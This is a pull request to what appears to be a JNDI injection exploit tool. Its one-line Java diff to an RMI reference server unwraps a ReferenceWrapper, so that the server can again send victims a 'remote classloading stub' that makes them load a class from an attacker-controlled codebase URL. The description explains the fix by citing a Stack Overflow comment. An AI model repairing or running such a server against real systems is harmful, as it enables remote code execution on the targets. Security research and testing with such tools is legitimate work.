### PR TITLE
Fixed IllegalArgumentException

### DIFF
--- a/src/main/java/jndi/RMIRefServer.java
+++ b/src/main/java/jndi/RMIRefServer.java
@@ -352,7 +352,7 @@ public class RMIRefServer implements Runnable {
                                 getLocalTime() + " [RMISERVER]  >> Sending remote classloading stub targeting %s",
                                 new URL(cpstring + reference.concat(".class"))));
 
-                Reflections.setFieldValue(rw, "wrappee", new Reference("Foo", reference, turl.toString()));
+                Reflections.setFieldValue(rw, "wrappee", new Reference("Foo", reference, turl.toString()).getReference());
             }
             Field refF = RemoteObject.class.getDeclaredField("ref");
             refF.setAccessible(true);


### PR DESCRIPTION
According to a comment on [this](https://stackoverflow.com/questions/68031764/jndi-referencermi-load-remote-class-failed) stackoverflow question, JNDI automatically substitutes javax.naming.Reference for com.sun.jndi.rmi.registry.ReferenceWrapper.

So you have to get the reference from it with getReference().

Should fix #7